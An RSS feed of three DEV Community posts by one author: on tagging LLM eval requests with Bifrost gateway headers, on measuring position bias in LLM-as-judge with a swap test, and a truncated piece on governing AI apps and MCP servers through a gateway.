<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Marcus Chen</title>
    <description>The latest articles on DEV Community by Marcus Chen (@marcuswwchen).</description>
    <link>https://dev.to/marcuswwchen</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3859428%2F572085fe-831d-498b-854b-41102c7902ee.jpg</url>
      <title>DEV Community: Marcus Chen</title>
      <link>https://dev.to/marcuswwchen</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/marcuswwchen"/>
    <language>en</language>
    <item>
      <title>Request tagging for LLM evals with Bifrost dimension headers</title>
      <dc:creator>Marcus Chen</dc:creator>
      <pubDate>Thu, 25 Jun 2026 16:01:58 +0000</pubDate>
      <link>https://dev.to/marcuswwchen/request-tagging-for-llm-evals-with-bifrost-dimension-headers-38li</link>
      <guid>https://dev.to/marcuswwchen/request-tagging-for-llm-evals-with-bifrost-dimension-headers-38li</guid>
      <description>&lt;p&gt;&lt;strong&gt;TL;DR:&lt;/strong&gt; Request tagging with Bifrost dimension headers (&lt;code&gt;x-bf-dim-*&lt;/code&gt;) stamps checkpoint and run metadata onto every LLM eval call, so you slice scores by model version instead of guessing which change moved the aggregate.&lt;/p&gt;

&lt;p&gt;We ran roughly 12,000 eval requests across four fine-tuned checkpoints last sprint, and when aggregate accuracy moved three points I couldn't tell which checkpoint produced which response. Our eval harness stored prompts and scores in one table; the routing layer recorded latency and provider somewhere else, and nothing carried the experiment ID end to end. We moved the eval traffic behind &lt;a href="https://www.getmaxim.ai/bifrost" rel="noopener noreferrer"&gt;Bifrost&lt;/a&gt;, &lt;a href="https://github.com/maximhq/bifrost" rel="noopener noreferrer"&gt;the open-source AI gateway&lt;/a&gt; from Maxim AI, and used its custom dimension headers to stamp each request with the checkpoint and run ID. Request tagging turned a join-by-timestamp guessing game into a filter.&lt;/p&gt;

&lt;h2&gt;
  
  
  What request tagging means for LLM evals
&lt;/h2&gt;

&lt;p&gt;Request tagging attaches key-value metadata to each LLM API call so downstream logs, traces, and metrics can be grouped by that metadata. In Bifrost, any header prefixed &lt;code&gt;x-bf-dim-*&lt;/code&gt; becomes a custom dimension that is auto-forwarded to logs, traces, and Prometheus, which lets you group eval scores by checkpoint, prompt version, or suite without modifying your harness.&lt;/p&gt;

&lt;p&gt;I lead the fine-tuning and evaluation team at Nexus Labs, a Series B company building enterprise agent automation. Our problem was attribution, not measurement. A scoring function that returns 0.81 is useless if you can't tie that number to &lt;code&gt;agentqa-v7-lora-r16&lt;/code&gt; versus &lt;code&gt;agentqa-v6&lt;/code&gt;. Most eval setups solve this by threading an experiment ID through every layer of application code, which breaks the moment someone forgets a kwarg. Pushing the metadata into a request header at the gateway means the harness stays dumb and the dimension travels with the request.&lt;/p&gt;

&lt;h2&gt;
  
  
  Stamping requests with x-bf-dim headers
&lt;/h2&gt;

&lt;p&gt;Bifrost is a &lt;a href="https://docs.getbifrost.ai/features/drop-in-replacement" rel="noopener noreferrer"&gt;drop-in replacement&lt;/a&gt; for the OpenAI base URL, so the only change to our harness was the &lt;code&gt;base_url&lt;/code&gt; and three extra headers. The gateway holds the provider keys, so the client API key is unused.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;openai&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;OpenAI&lt;/span&gt;

&lt;span class="n"&gt;client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;OpenAI&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;base_url&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;http://localhost:8080/v1&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;api_key&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;unused-bifrost-holds-keys&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;resp&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;chat&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;completions&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;create&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;model&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;openai/gpt-4o-mini&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;messages&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;role&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;user&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;content&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;eval_case&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;prompt&lt;/span&gt;&lt;span class="p"&gt;}],&lt;/span&gt;
    &lt;span class="n"&gt;extra_headers&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;x-bf-dim-checkpoint&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;agentqa-v7-lora-r16&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;x-bf-dim-run-id&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;eval-2026-06-19-batch3&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;x-bf-dim-suite&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;tool-routing-adversarial&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;},&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Every request in that batch now carries three dimensions. When the scorer writes its verdict, I don't need to correlate anything by hand; the gateway already recorded the dimensions next to the latency, token counts, and resolved provider. The same endpoint fronts &lt;a href="https://docs.getbifrost.ai/providers/supported-providers/overview" rel="noopener noreferrer"&gt;20+ providers&lt;/a&gt;, so when I shadow a hosted model against a self-hosted checkpoint, both legs of the comparison get tagged identically and land in the same store.&lt;/p&gt;

&lt;h2&gt;
  
  
  Slicing eval results in observability
&lt;/h2&gt;

&lt;p&gt;The dimensions are only useful if the read path is cheap. Bifrost writes telemetry through &lt;a href="https://docs.getbifrost.ai/features/observability" rel="noopener noreferrer"&gt;async observability&lt;/a&gt; with under 0.1ms of added overhead, using SQLite by default and Postgres for production volume. The sinks include Prometheus, OpenTelemetry, Datadog, and BigQuery, so I query the same dimensions from whichever tool the rest of the team already watches.&lt;/p&gt;

&lt;p&gt;In practice I pull a Prometheus query grouped by &lt;code&gt;checkpoint&lt;/code&gt; and &lt;code&gt;suite&lt;/code&gt;, then compute per-slice accuracy from the scorer table joined on &lt;code&gt;run_id&lt;/code&gt;. That is where the three-point aggregate move resolved: checkpoint v7 gained on the general suite and lost on the adversarial tool-routing suite, which the average had flattened. This kind of per-segment attribution is the whole reason I distrust single-number eval reports. Aggregate metrics are a summary statistic, and summary statistics hide structure by design. The methodology argument is old; the &lt;a href="https://arxiv.org/abs/2211.09110" rel="noopener noreferrer"&gt;HELM evaluation work&lt;/a&gt; made the case for multi-metric, multi-scenario reporting years ago. Tagging at the gateway is the plumbing that makes per-scenario reporting cheap enough to actually do on every run.&lt;/p&gt;

&lt;p&gt;One detail that saved me time: the dimensions are arbitrary strings, so I tag prompt-template hashes too. When a template edit slipped into a run, the &lt;code&gt;prompt_hash&lt;/code&gt; dimension showed two distinct values inside one supposedly clean batch, and I caught a contaminated comparison before it reached a decision.&lt;/p&gt;

&lt;h2&gt;
  
  
  Trade-offs and limitations
&lt;/h2&gt;

&lt;p&gt;This is not free infrastructure. Bifrost runs as a separate Go service, so you operate one more process, and a serious deployment needs Postgres rather than the default SQLite once you push real eval volume through it. If your stack is pure Python and you want everything in-process, a library like LiteLLM keeps fewer moving parts, at the cost of the gateway-level telemetry I'm describing here. Bifrost's ecosystem is also younger than LiteLLM's, so you will find fewer community examples for edge integrations.&lt;/p&gt;

&lt;p&gt;The dimension headers are forwarded, not validated. Nothing stops a typo in &lt;code&gt;x-bf-dim-checkpoint&lt;/code&gt; from creating a phantom slice, so I keep the tag values in one constants module and assert against it in the harness. Cluster-mode horizontal scaling is an &lt;a href="https://www.getmaxim.ai/bifrost/enterprise" rel="noopener noreferrer"&gt;enterprise feature&lt;/a&gt;, not part of the open-source core, which matters if your eval fleet outgrows a single instance. For a four-checkpoint sprint on one box, none of this bit me. Know your scale before you assume it won't.&lt;/p&gt;

&lt;h2&gt;
  
  
  Wrapping up
&lt;/h2&gt;

&lt;p&gt;Request tagging with &lt;code&gt;x-bf-dim-*&lt;/code&gt; dimension headers moved attribution out of my eval code and into the gateway, which is where it belongs when many checkpoints and suites share one pipeline. The model was never the hard part. Knowing which model produced which number was. If you want to see the tagging and observability path end to end, book a demo: &lt;a href="https://getmaxim.ai/bifrost/book-a-demo" rel="noopener noreferrer"&gt;https://getmaxim.ai/bifrost/book-a-demo&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Further reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://docs.getbifrost.ai/features/observability" rel="noopener noreferrer"&gt;Bifrost observability docs&lt;/a&gt; for the metrics and sink configuration&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://docs.getbifrost.ai/providers/supported-providers/overview" rel="noopener noreferrer"&gt;Supported providers overview&lt;/a&gt; for the unified endpoint&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.getmaxim.ai/bifrost/resources/buyers-guide" rel="noopener noreferrer"&gt;Bifrost buyer's guide&lt;/a&gt; for deployment patterns&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2211.09110" rel="noopener noreferrer"&gt;HELM: Holistic Evaluation of Language Models&lt;/a&gt; on multi-metric eval reporting&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://opentelemetry.io/docs/" rel="noopener noreferrer"&gt;OpenTelemetry documentation&lt;/a&gt; for trace and metric standards&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>machinelearning</category>
      <category>mlops</category>
      <category>llm</category>
    </item>
    <item>
      <title>Position bias in LLM-as-judge flipped 18% of our verdicts</title>
      <dc:creator>Marcus Chen</dc:creator>
      <pubDate>Thu, 25 Jun 2026 06:31:28 +0000</pubDate>
      <link>https://dev.to/marcuswwchen/position-bias-in-llm-as-judge-flipped-18-of-our-verdicts-13lf</link>
      <guid>https://dev.to/marcuswwchen/position-bias-in-llm-as-judge-flipped-18-of-our-verdicts-13lf</guid>
      <description>&lt;p&gt;&lt;strong&gt;TL;DR:&lt;/strong&gt; Position bias in LLM-as-judge means the model favors whichever answer it reads first. We measured an 18% verdict flip rate from swapping order alone, and dual-pass scoring brought it under 4%.&lt;/p&gt;

&lt;p&gt;Our pairwise evaluation harness at Nexus Labs scored answer A over answer B in 18% of cases purely because A appeared first in the judge prompt. We caught it when a regression in our agent-automation model showed a 6-point win on the leaderboard that vanished the moment a teammate reran the same comparisons with the candidate listed second. Position bias in LLM-as-judge is well documented, but most teams never measure it on their own data, so they ship on numbers that move when you shuffle the prompt. The judge model here was &lt;code&gt;gpt-4o-2024-08-06&lt;/code&gt;, scoring 1,200 pairwise comparisons of customer-support agent responses.&lt;/p&gt;

&lt;p&gt;This is the part of evaluation that gets skipped because the harness looks like it works. It returns scores. The scores have decimals. They go in a dashboard. Nobody checks whether the decimals mean anything.&lt;/p&gt;

&lt;h2&gt;
  
  
  What position bias in LLM-as-judge actually is
&lt;/h2&gt;

&lt;p&gt;Position bias in LLM-as-judge is the tendency of a model to prefer a response based on where it sits in the prompt rather than its quality. When you ask a model to pick the better of two answers, listing the same answer first versus second changes the verdict at a measurable rate. The effect was named in &lt;a href="https://arxiv.org/abs/2305.17926" rel="noopener noreferrer"&gt;Large Language Models are not Fair Evaluators&lt;/a&gt; and confirmed across judge models in the &lt;a href="https://arxiv.org/abs/2306.05685" rel="noopener noreferrer"&gt;MT-Bench paper&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;It is not random noise. The bias has a direction. In our runs &lt;code&gt;gpt-4o&lt;/code&gt; preferred the first position about 11 points more often than chance would predict, which is consistent with the first-position skew reported in both papers above.&lt;/p&gt;

&lt;h2&gt;
  
  
  How we measured the flip rate
&lt;/h2&gt;

&lt;p&gt;The measurement is cheap. For every pair, run the judge twice: once with the candidate in slot A, once in slot B. If the verdict changes when only the order changed, that pair is order-sensitive. The flip rate is the fraction of pairs where this happens.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;judge_pair&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;judge&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;question&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;resp_x&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;resp_y&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="c1"&gt;# returns "x", "y", or "tie"
&lt;/span&gt;    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;judge&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;compare&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;question&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;first&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;resp_x&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;second&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;resp_y&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;flips&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;q&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cand&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;base&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;pairs&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;v1&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;judge_pair&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;judge&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;q&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cand&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;base&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;   &lt;span class="c1"&gt;# candidate first
&lt;/span&gt;    &lt;span class="n"&gt;v2&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;judge_pair&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;judge&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;q&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;base&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cand&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;   &lt;span class="c1"&gt;# candidate second
&lt;/span&gt;    &lt;span class="c1"&gt;# normalize v2 back to candidate-vs-base framing
&lt;/span&gt;    &lt;span class="n"&gt;v2_norm&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;x&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;y&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;y&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;x&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;tie&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;tie&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;}[&lt;/span&gt;&lt;span class="n"&gt;v2&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;v1&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;v2_norm&lt;/span&gt; &lt;span class="ow"&gt;and&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;tie&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;v1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;v2_norm&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;flips&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;

&lt;span class="n"&gt;flip_rate&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;flips&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pairs&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We ran this across three judges. &lt;code&gt;gpt-4o&lt;/code&gt; flipped on 18% of pairs, &lt;code&gt;claude-3-5-sonnet&lt;/code&gt; on 12%, and a smaller &lt;code&gt;gpt-4o-mini&lt;/code&gt; judge flipped on 29%. The smaller the judge, the worse the bias, which tracks with the intuition that weaker models lean harder on surface cues like ordering.&lt;/p&gt;

&lt;p&gt;To run the same comparison set against multiple providers without writing a client per vendor, we put the judge calls behind &lt;a href="https://www.getmaxim.ai/bifrost" rel="noopener noreferrer"&gt;Bifrost&lt;/a&gt; and pointed the harness at one OpenAI-compatible endpoint. That is the only infrastructure note here; the method works with any client you already have.&lt;/p&gt;

&lt;h2&gt;
  
  
  Dual-pass scoring and other fixes
&lt;/h2&gt;

&lt;p&gt;The fix that worked was the boring one: judge every pair in both orders and only count a win when both passes agree. Disagreements become ties. This is the swap-and-average approach the MT-Bench authors recommend, and it dropped our flip-driven verdicts to under 4% of pairs, because a true difference in quality survives the swap while an order artifact does not.&lt;/p&gt;

&lt;p&gt;Three approaches we compared:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Dual-pass with agreement gate.&lt;/strong&gt; Run both orders, count a win only on agreement. Doubles judge cost, removes most order artifacts. This is what we shipped.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Score averaging.&lt;/strong&gt; Average a numeric score across both orders instead of gating. Cheaper to reason about, but a confident wrong score in one order can still drag the mean.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Reference-anchored scoring.&lt;/strong&gt; Score each answer independently against a rubric instead of head-to-head, as in &lt;a href="https://arxiv.org/abs/2303.16634" rel="noopener noreferrer"&gt;G-Eval&lt;/a&gt;. Removes pairwise ordering entirely, but rubric scores are noisier and harder to calibrate across raters.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We also report Cohen's kappa between the two passes as a standing health metric. When kappa drops below 0.6 on a new judge or prompt template, we treat the judge as unreliable for that task and stop trusting its leaderboard until we debug the template.&lt;/p&gt;

&lt;h2&gt;
  
  
  Trade-offs and limitations
&lt;/h2&gt;

&lt;p&gt;Dual-pass doubles judge token cost, which on 1,200 pairs at our prompt sizes added a few dollars per eval run. That is fine for release gates and unacceptable for per-request online scoring, so we only run it offline.&lt;/p&gt;

&lt;p&gt;Gating on agreement inflates the tie count. Roughly a fifth of our previously decisive verdicts became ties, which makes small model improvements harder to detect. That is the correct outcome, not a bug: if a difference does not survive an order swap, calling it a win was the original mistake.&lt;/p&gt;

&lt;p&gt;None of this addresses other judge biases. Length bias, self-preference when a model judges its own outputs, and sensitivity to formatting all persist. Position bias is the easiest one to measure, so it is the right place to start, not the place to stop.&lt;/p&gt;

&lt;h2&gt;
  
  
  Where to go next
&lt;/h2&gt;

&lt;p&gt;If you run any LLM-as-judge pipeline, measure your flip rate before you touch anything else. It takes one extra pass over an existing comparison set and tells you whether your leaderboard reflects model quality or prompt ordering. I would run the swap test on your next eval, log Cohen's kappa between passes, and only then argue about which model won.&lt;/p&gt;

&lt;h2&gt;
  
  
  Further reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2305.17926" rel="noopener noreferrer"&gt;Large Language Models are not Fair Evaluators&lt;/a&gt; — the paper that quantified position bias in pairwise judging.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2306.05685" rel="noopener noreferrer"&gt;Judging LLM-as-a-Judge with MT-Bench and Chatbot Arena&lt;/a&gt; — swap-and-average and agreement analysis.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2303.16634" rel="noopener noreferrer"&gt;G-Eval: NLG Evaluation using GPT-4 with Better Human Alignment&lt;/a&gt; — reference-anchored scoring as an alternative to pairwise.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://scikit-learn.org/stable/modules/generated/sklearn.metrics.cohen_kappa_score.html" rel="noopener noreferrer"&gt;scikit-learn Cohen's kappa&lt;/a&gt; — inter-pass agreement scoring.&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>machinelearning</category>
      <category>llm</category>
      <category>mlops</category>
      <category>aiengineering</category>
    </item>
    <item>
      <title>Governing AI Apps and the MCP Servers They Connect To From One Dashboard</title>
      <dc:creator>Marcus Chen</dc:creator>
      <pubDate>Wed, 24 Jun 2026 18:30:06 +0000</pubDate>
      <link>https://dev.to/marcuswwchen/governing-ai-apps-and-the-mcp-servers-they-connect-to-from-one-dashboard-32nh</link>
      <guid>https://dev.to/marcuswwchen/governing-ai-apps-and-the-mcp-servers-they-connect-to-from-one-dashboard-32nh</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fn15eul1k24oc4l2rs2fx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fn15eul1k24oc4l2rs2fx.png" alt="Governing AI Apps and the MCP Servers They Connect To From One Dashboard" width="800" height="457"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;As AI adoption surges, organizations face challenges governing the proliferation of AI apps and the unmanaged MCP servers employees use. Learn how to centralize AI governance with &lt;a href="https://www.getmaxim.ai/bifrost" rel="noopener noreferrer"&gt;Bifrost&lt;/a&gt; and &lt;a href="https://www.getmaxim.ai/bifrost/edge" rel="noopener noreferrer"&gt;Bifrost Edge&lt;/a&gt; for comprehensive control and visibility.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The rapid adoption of AI across enterprises has brought unprecedented efficiency, but it also introduces complex governance challenges. Employees routinely use AI tools and connect to Model Context Protocol (MCP) servers without formal oversight, creating "shadow AI" and significant security and compliance risks. Addressing this requires a unified approach that brings both AI application usage and the underlying MCP server interactions under a single pane of glass. &lt;a href="https://www.getmaxim.ai/bifrost" rel="noopener noreferrer"&gt;Bifrost&lt;/a&gt;, an &lt;a href="https://github.com/maximhq/bifrost" rel="noopener noreferrer"&gt;open-source AI gateway&lt;/a&gt; from Maxim AI, provides the core control plane, which is then extended to every endpoint by Bifrost Edge for comprehensive governance.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Rise of Shadow AI and Ungoverned Endpoints
&lt;/h2&gt;

&lt;p&gt;The proliferation of generative AI tools means employees are increasingly using AI in their daily workflows, often without IT approval. Approximately 67% of employees use AI tools at work, yet only 18% of organizations have formal AI security policies in place. This disparity creates a significant "shadow AI" problem, where sensitive data, including personally identifiable information (PII) and intellectual property, can be exposed. PII is exposed in about 65% of shadow AI-related incidents, while intellectual property is exposed in around 40% of incidents.&lt;/p&gt;

&lt;p&gt;Beyond consumer-grade AI chat apps, the Model Context Protocol (MCP) allows AI agents to connect to external tools like databases, APIs, and internal systems, enabling powerful autonomous actions. While beneficial for productivity, ungoverned MCP server usage introduces critical security risks. These include sensitive data exfiltration, unauthorized actions from compromised tool responses, overprivileged agent access, and a lack of audit trails connecting agent actions to human accountability. Many organizations lack comprehensive visibility into how employees use AI, with some reports indicating only 25% have such insight.&lt;/p&gt;

&lt;h2&gt;
  
  
  Centralized AI Governance with the AI Gateway
&lt;/h2&gt;

&lt;p&gt;An AI gateway functions as a centralized control plane for all AI traffic between applications and LLM providers. It intercepts every request and response, enforcing policies, routing decisions, authentication, and compliance controls. Bifrost, as an AI gateway, offers a robust set of features to establish this central governance:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Virtual Keys:&lt;/strong&gt; These serve as the primary governance entity, allowing administrators to set per-consumer access permissions, budgets, and rate limits for AI usage.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Routing and Failover:&lt;/strong&gt; Intelligent routing directs requests to specific models, providers, and keys, ensuring automatic failover in case of provider outages and optimizing performance and cost.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Guardrails:&lt;/strong&gt; Content safety guardrails can be configured to catch sensitive information like secrets or PII before it leaves the organization's network, supporting compliance standards like SOC 2, GDPR, HIPAA, and ISO 27001.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Audit Logs:&lt;/strong&gt; Immutable audit logs provide a clear record of all AI interactions, which is crucial for accountability and regulatory compliance.&lt;/li&gt;
&lt;/ul&gt;

